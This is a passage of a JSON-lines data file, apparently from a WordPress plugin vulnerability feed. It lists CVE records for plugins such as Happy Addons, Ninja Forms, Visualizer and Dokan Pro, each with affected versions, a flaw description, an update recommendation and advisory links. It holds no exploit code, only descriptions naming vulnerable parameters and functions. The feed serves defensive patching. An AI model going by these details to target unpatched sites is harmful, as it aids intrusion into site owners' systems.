version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb037c9f-5d20-46f6-b1ff-34b9d192bad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb037c9f-5d20-46f6-b1ff-34b9d192bad2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-accordion\\\/widget.php#L1462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-accordion\\\/widget.php#L1462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3750","slug":"visualizer","versionImpact":"3.10.15","versionEndExcluding":"3.11.0","description":"The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on the getQueryData() function in all versions up to, and including, 3.10.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform arbitrary SQL queries that can be leveraged for privilege escalation among many other actions.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d27544c-97a5-42cd-ab07-358f819acbc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d27544c-97a5-42cd-ab07-358f819acbc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visualizer\\\/trunk\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php#L1421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visualizer\\\/trunk\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php#L1421\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Source\\\/Query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Source\\\/Query.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3714","slug":"give","versionImpact":"3.10.0","versionEndExcluding":"3.11.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'give_form' shortcode when used with a legacy form in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd8f5cfa-3431-4617-b2cd-d5a8ce4530f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd8f5cfa-3431-4617-b2cd-d5a8ce4530f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083390\\\/give\\\/tags\\\/3.11.0\\\/includes\\\/class-give-donate-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083390\\\/give\\\/tags\\\/3.11.0\\\/includes\\\/class-give-donate-form.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3922","slug":"dokan-pro","versionImpact":"3.10.3","versionEndExcluding":"3.11.0","description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9de41de-f2f7-4b16-8ec9-d30bbd3d8786?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9de41de-f2f7-4b16-8ec9-d30bbd3d8786?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/dokan.co\\\/docs\\\/wordpress\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/dokan.co\\\/docs\\\/wordpress\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28421","slug":"wp-email-capture","versionEndExcluding":"3.11","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin \u2013 WP Email Capture.This issue affects WordPress Email Marketing Plugin \u2013 WP Email Capture: from n\/a through 3.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-email-capture\\\/wordpress-wp-email-capture-plugin-3-10-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-email-capture\\\/wordpress-wp-email-capture-plugin-3-10-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6556","slug":"smartcrawl-seo","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.10.8. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d357096-25da-4cbf-9c6c-261bf1b29a9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d357096-25da-4cbf-9c6c-261bf1b29a9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115079%40smartcrawl-seo&new=3115079%40smartcrawl-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115079%40smartcrawl-seo&new=3115079%40smartcrawl-seo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4865","slug":"happy-elementor-addons","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdf2020-ad80-44c3-89b6-fc2ba067cd33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdf2020-ad80-44c3-89b6-fc2ba067cd33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5088","slug":"happy-elementor-addons","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/203ab09f-7344-4cab-86bf-0c1ec545d78f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/203ab09f-7344-4cab-86bf-0c1ec545d78f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L360\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L360\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0324","slug":"profile-builder","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/profile-builder\\\/blob\\\/main\\\/profile-builder\\\/admin\\\/admin-functions.php#L517\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/profile-builder\\\/blob\\\/main\\\/profile-builder\\\/admin\\\/admin-functions.php#L517\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022354\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022354\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4391","slug":"happy-elementor-addons","versionImpact":"3.10.7","versionEndExcluding":"3.10.8","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Event Calendar widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75f7e1a-f3bb-4b24-bf04-b83d0e572551?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75f7e1a-f3bb-4b24-bf04-b83d0e572551?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php#L1811\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php#L1811\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6504","slug":"profile-builder","versionImpact":"3.10.6","versionEndExcluding":"3.10.8","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the wppb_toolbox_usermeta_handler function in all versions up to, and including, 3.10.7. This makes it possible for authenticated attackers, with contributor-level access and above, to expose sensitive information within user metadata.","recommendation":"Update to version 3.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f515ccf8-7231-4728-b155-c47049087d42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f515ccf8-7231-4728-b155-c47049087d42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012472\\\/profile-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012472\\\/profile-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3891","slug":"happy-elementor-addons","versionImpact":"3.10.5","versionEndExcluding":"3.10.6","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML tags in widgets in all versions up to, and including, 3.10.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ade7f391-3824-4d0b-8718-f7995170a43d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ade7f391-3824-4d0b-8718-f7995170a43d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3724","slug":"happy-elementor-addons","versionImpact":"3.10.4","versionEndExcluding":"3.10.5","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Stack Group, Photo Stack, & Horizontal Timeline widgets in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826483d7-948d-46c4-890c-71001b03847c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826483d7-948d-46c4-890c-71001b03847c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/photo-stack\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/photo-stack\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-stack-group\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-stack-group\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/horizontal-timeline\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/horizontal-timeline\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6626","slug":"shortpixel-adaptive-images","versionImpact":"3.10.4","versionEndExcluding":"3.10.5","description":"The ShortPixel Adaptive Images \u2013 WebP, AVIF, CDN, Image Optimization plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the API URL Setting in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortpixel-adaptive-images\\\/tags\\\/3.10.4\\\/includes\\\/front\\\/vanilla-js-loader.class.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortpixel-adaptive-images\\\/tags\\\/3.10.4\\\/includes\\\/front\\\/vanilla-js-loader.class.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3337681%40shortpixel-adaptive-images&new=3337681%40shortpixel-adaptive-images&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3337681%40shortpixel-adaptive-images&new=3337681%40shortpixel-adaptive-images&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ab6429-4b1b-461a-9fcd-b4be84985118?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ab6429-4b1b-461a-9fcd-b4be84985118?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12173","slug":"master-slider","versionImpact":"3.10.0","versionEndExcluding":"3.10.5","description":"The Master Slider  WordPress plugin before 3.10.5 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f35be0e-0f63-4e33-aa4d-c47b1f1e0595\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f35be0e-0f63-4e33-aa4d-c47b1f1e0595\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3287","slug":"smartcrawl-seo","versionImpact":"3.10.2","versionEndExcluding":"3.10.3","description":"The SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer plugin for WordPress is vulnerable to unauthorized ld+json description injection due to a missing capability check on the save_settings function in all versions up to, and including, 3.10.2. This makes it possible for unauthenticated attackers to save schema types.","recommendation":"Update to version 3.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a77672b-340e-4f10-abe7-461c2db537b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a77672b-340e-4f10-abe7-461c2db537b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073136\\\/smartcrawl-seo\\\/trunk\\\/includes\\\/core\\\/schema\\\/class-types.php?old=2943058&old_path=smartcrawl-seo%2Ftrunk%2Fincludes%2Fcore%2Fschema%2Fclass-types.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073136\\\/smartcrawl-seo\\\/trunk\\\/includes\\\/core\\\/schema\\\/class-types.php?old=2943058&old_path=smartcrawl-seo%2Ftrunk%2Fincludes%2Fcore%2Fschema%2Fclass-types.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5398","slug":"ninja-forms","versionImpact":"3.10.2.1","versionEndExcluding":"3.10.2.2","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of a templating engine in all versions up to, and including, 3.10.2.1 due to insufficient output escaping on user data passed through the template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/min\\\/front-end.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/min\\\/front-end.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3317181%40ninja-forms&new=3317181%40ninja-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3317181%40ninja-forms&new=3317181%40ninja-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92d106c6-a910-4f41-94d1-59f6b7f3aeb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92d106c6-a910-4f41-94d1-59f6b7f3aeb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2203","slug":"funnel-builder","versionImpact":"3.10.1","versionEndExcluding":"3.10.2","description":"The FunnelKit  WordPress plugin before 3.10.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d553cff4-074a-44e7-aebe-e61c86ab8042\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d553cff4-074a-44e7-aebe-e61c86ab8042\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0438","slug":"happy-elementor-addons","versionEndExcluding":"3.10.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/extensions\\\/wrapper-link.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/extensions\\\/wrapper-link.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/happy-addons.js#L991\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/happy-addons.js#L991\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2561","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a2074a3-a479-4473-92fb-04397f20dd86\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a2074a3-a479-4473-92fb-04397f20dd86\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2560","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adaa55a-4a6d-40ca-ae19-fcb82420894a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adaa55a-4a6d-40ca-ae19-fcb82420894a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2524","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e89ad2b-f12e-4b49-b34e-8da7d30629cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e89ad2b-f12e-4b49-b34e-8da7d30629cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
